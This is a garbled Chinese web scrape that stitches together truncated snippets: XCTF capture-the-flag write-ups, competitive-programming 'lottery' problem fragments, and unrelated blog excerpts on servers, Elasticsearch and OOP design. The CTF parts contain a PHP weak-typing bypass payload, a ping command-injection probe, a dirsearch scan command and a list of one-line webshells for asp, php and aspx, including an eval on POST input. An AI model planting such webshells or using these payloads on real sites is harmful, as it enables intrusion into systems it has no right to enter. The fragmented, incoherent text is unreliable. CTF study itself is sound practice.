XCTF lottery

摇奖中彩票，规则及金额都标明了，7位数全对有大奖flag在这，需要钱买抓包分析 我们需要输入的数字与win_numbers相等才有钱，一个数要等于一个数，这里想到php是弱类型语句，只要使比对结果想等就ok。payload如下：{"action":"buy","numbers":"[true,true,true,true,true,true,true]"}对比成功，多发几次包就可以凑齐买flag

1. 直接进入实验环境，按照提示玩一遍玩完后，直接账户为0，好家伙，赌博真不行，就这运气迟早输到裸奔。。。再点点兑奖页面，发现购买flag需要$9990000，于是大胆猜测，这一题提示我们要想办法赢钱，去获得足够的money去购买到最终的flag！2. 解题开始猜测响是拿到后台

LotteryTime Limit: 2000/1000 MS (Java/Others)Memory Limit: 65536/32768 K (Java/Others) Total Submission(s): 2061Accepted Submission(s): 941 Problem

589IDescriptionToday Berland holds a lottery with a prize —

题意 有n个值为2^a[i]数量为k的物品，问最多能组成多少种不同的数。结论：先将每一段尽量扩展连续的一段，如 1 3 1 扩展成 1 1 2 ，最后答案就是每一段的方案数相乘（ps:经过尝试包含至少一个零的任意两段之间的任意两个数组合都能组合出来不同的数，太tm神奇了。 ），然而每一段可以从后往前递推， 前一项+=后一项*2，然后答案就是第一项个数+1.#include<bits/stdc++.h>using namespace std;#define int long long .

https://www.luogu.com.cn/problem/UVA10325 题意： 给出m个数，求n以内不能被任意一个数整除的个数 容斥原理 水题洗刷刷 #include<cstdio> #include<algorithm> using namespace std; int n,m,ans

一.进入实验环境 1.进入之后提示我们输入域名：试着输入baidu.com，但没什么反应 2.再输入127.0.0.1，显示出了一个ping的结果，猜测是否可以使用管道命令。 输入127.000.1 | ls，果然没什么用，猜测应该是被过滤了。 根据大佬的做法： 3.输入@，发现没有被过滤。 尝试在

一.根据一句话木马获得站点的目录 1.常见的一句话木马 asp一句话木马： <%execute(request("value"))%> php一句话木马： <?php @eval($_POST[value]);?> aspx一句话木马： <%@ Page Language="Jscript"%> <

一.进入实验环境 二.根据题目的描述，发现这道题应该和备份文件有关 1.掌握有关备份文件的知识 常见的备份文件后缀名有: .git .svn .swp .svn .~.bak .bash_history 等， 2.进入之后发现题目要我们找出index.php的备份文件 3.可以根据常见的备份文件后缀

http://www.elijahqi.win/archives/3871 Allen has a LOT of money. He has n dollars in the bank. For security reasons, he wants to withdraw it in cash (we will not disclose the reasons here). The deno...

一.进入实验 1.打开后，简单看了一下，首先是让我们注册，然后登录：这里我随便注册一个 然后登录，登录后发现有几个功能，当点击manage时，提示要管理员才行。 2.所以这个地方我们想能不能获取到 admin 的账号，傻傻的我开始了一段时间的sql注入，但没有发现注入点。 退出后有个 Findwd

一.进入实验环境 点击About，发现git，可能有git源码泄露，访问git发现确实存在源码泄露，这里用 GitHack去获取源码。 在flag.php文件中，结果一段时间的审计，发现存在 这里没有对输入的的page经过严格的过滤和处理。 先了解一下这个函数： bool assert(mixe

一.了解cookie（来源于网络） 1.概念 HTTP协议本身是无状态的。什么是无状态呢，即服务器无法判断用户身份。Cookie实际上是一小段的文本信息（key-value格式）。客户端向服务器发起请求，如果服务器需要记录该用户状态，就使用response向客户端浏览器颁发一个Cookie。客户端浏

题目来源: XCTF。

一.进入实验环境 1.先来一波常规扫描： 我们尝试访问login.php，查看源码发现它给了我们一个提示让我们传debug=xx 果然得到有用的东西，根据语法可以知道使用的是sqlite数据库，分析代码可以知道通过post方式接受的参数没有做任何的过滤， 如果id不为空就执行 setcookie函数

一.进入实验 1.先用 dirsearch 去扫描目录 python dirsearch.py -u "http://111.198.29.45:33988/" -e * 根据扫描的结果我们发现了robots.txt，user.php，view.php等等，扫完之后先不急着去访问，在进入实验环境后，

CCPC 威海 Lottery #include <bits/stdc++.h> using namespace std; typedef long long ll; const int maxn = 1e5+10; const int mod = 1e9+7; /* 7-12 Lottery题解：

#include__int64 gcd(__int64 a,__int64 b){ return b==0?a:gcd(b,a%b); }int main(){ int i,j,prime[]={2,3,5,7,11,13,17,19},n,t; __int64 s1,s2,m,d,gd; while(scanf("%d",&n)==1) { s2=1;s1=0;t=0; if(n==21 || n==22) { for(i=2;id) {...

考虑到 \(N\le 10^4\) ，显然是 \(\mathcal{O}(N^2)\) 可过。 所以我们可以直接枚举两个区间计算贡献。 显然如果我们知道两两区间的距离，可以直接前缀和 \(\mathcal{O}(NQ)\) 求出最终答案。 现在我们计算两两区间的距离，直接枚举并匹配是 \(\math ...

周六来上班哈，早上闷头搭环境啊（刚来几天的实习生啊），忽然导师来找我，说“你去给那个服务器装个硬盘把”。我擦，虽然平时常常说服务器怎么怎么的，但是服务器内部我还是没见过的（小白），再加上之前实习的公司被我把服务器搞崩溃过，有心理阴影。然后就硬着头皮的接受了这个任务。我本着“不要怂就是干”社会指导思想，去装这个硬盘了。 1.任务：由于服务器本身是有一个硬盘的，所以，再装一个硬盘在硬件上，需

程序员小强总结的 ElasticSearch专题超全总结篇在这里:传送门 结合官网资料，做了更详细的实际使用总结。 从单机版安装到集群高可用生产环境搭建、基本概念(索引,分片,节点,倒排索引…)、DSL语法实践、分词器(内置+中文)、SpringBoot整合实战、仿京东商品搜索实战实现。1.前言正所谓“分词器用的好，查询没烦恼”, Elasticsearch会对text类型的参数会进行分词。本文主

/** ****************************************************************************** * @author    Maoxiao Hu * @version   V1.0.0 * @date       Feb-2015 ***************

公众号精选评论点赞 我们在7月发表了92篇文章，包括两个系列： 系统管理员的开源和Texas Linux Fest 。 我们欢迎15位新作者，我们的社区主持人发表了24篇文章（占总内容的26％）。 上个月，我们还推出了两个新专栏。 社区主持人唐·沃特金斯（Don Watkins）在“ 开放教育” （ Opening Up Education）上开设了新专栏，詹姆斯·福尔克纳（James Falk

 不用接口并不代表就不能解耦，就不是OOP，尤其是在事实上，99.99%的case都是接口与实现类严格的1:1实现的，在这种情况下，接口究竟有什么意义？是JVM的基于接口的动态代理吗？但既然基于cglib的动态继承也同样可以实现AOP，所以技术上的理由同样是不成立的。所以，这个问题真的是一个非常好的问题。先说一说我的工程实践，首先，在DAO层，我们是只用了一个通用的CommonDAO实现